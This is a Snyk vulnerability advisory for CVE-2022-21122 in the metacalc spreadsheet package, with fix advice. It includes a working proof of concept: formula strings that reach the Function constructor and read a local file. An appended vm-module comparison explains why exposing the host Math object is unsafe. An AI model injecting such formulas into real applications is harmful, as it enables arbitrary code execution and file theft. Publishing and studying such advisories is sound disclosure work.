CVE-2022-21122: Arbitrary Code Execution in metacalc | CVE-2022-21122 | Snyk
The package metacalc before 0.0.2 is vulnerable to Arbitrary Code Execution when it exposes JavaScript’s Math class to the v8 context. As the Math class is exposed to user-land, it can be used to get access to JavaScript’s Function constructor.
snyk-id: SNYK-JS-METACALC-2826197
published: 30 May 2022
disclosed: 17 May 2022
credit: Vladyslav Dukhin
How to fix?
Upgrade metacalc to version 0.0.2 or higher.
Overview
metacalc provides spreadsheet calculations for Metarhia.
Affected versions of this package are vulnerable to Arbitrary Code Execution when they expose JavaScript’s Math class to the v8 context. As the Math class is exposed to user-land, it can be used to get access to JavaScript’s Function constructor.
PoC
const { Sheet } = require('metacalc');
const sheet = new Sheet();
sheet.cells['A1'] = '=Math.ceil.constructor("console.log(process)")()';
console.log(sheet.values['A1']);
sheet.cells['A3'] = '=Math.ceil.constructor("console.log(process.mainModule.require(\'fs\').readFileSync(\'./poc.js\', \'utf-8\'))")()';
console.log(sheet.values['A3']);
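Why handing the host's Math into the context is enough, shown as an added example that is not part of the advisory and is neither metacalc's code nor its fix. It uses Node's built-in vm module; the helper names (evalInContext, reachesHostFunction, processVisible, audit) are hypothetical and the three configurations are constructed for comparison.

```javascript
// Added illustration; helper names are hypothetical, not metacalc's API.
const vm = require('vm');

// Evaluate an expression in a fresh V8 context whose globals are `globals`.
function evalInContext(expr, globals) {
  return vm.runInContext(expr, vm.createContext(globals), { timeout: 100 });
}

// True when a formula can walk from Math.ceil to the HOST realm's Function
// constructor, i.e. the identity matches the Function outside the context.
function reachesHostFunction(globals) {
  return evalInContext('Math.ceil.constructor', globals) === Function;
}

// Harmless probe: what does code compiled by that constructor see as `process`?
function processVisible(globals) {
  return evalInContext('Math.ceil.constructor("return typeof process")()', globals);
}

// Constructed configurations to compare.
const configs = {
  // Pattern described in the advisory: the host's Math object is handed in.
  hostMath: () => ({ Math }),
  // Freezing or copying does not help: ceil is still a host-realm function.
  frozenCopy: () => ({ Math: Object.freeze({ ceil: Math.ceil }) }),
  // Nothing handed in: the context resolves Math to its own built-in.
  contextMath: () => ({}),
};

// Run both probes against every configuration and collect the results.
function audit() {
  const report = {};
  for (const [name, make] of Object.entries(configs)) {
    report[name] = {
      hostFunctionReachable: reachesHostFunction(make()),
      processSeen: processVisible(make()),
    };
  }
  return report;
}

console.log(audit());
```

Node's documentation states that the vm module is not a security mechanism, so the contextMath result shows only that this particular path through Math is closed, not that the context is safe for untrusted formulas.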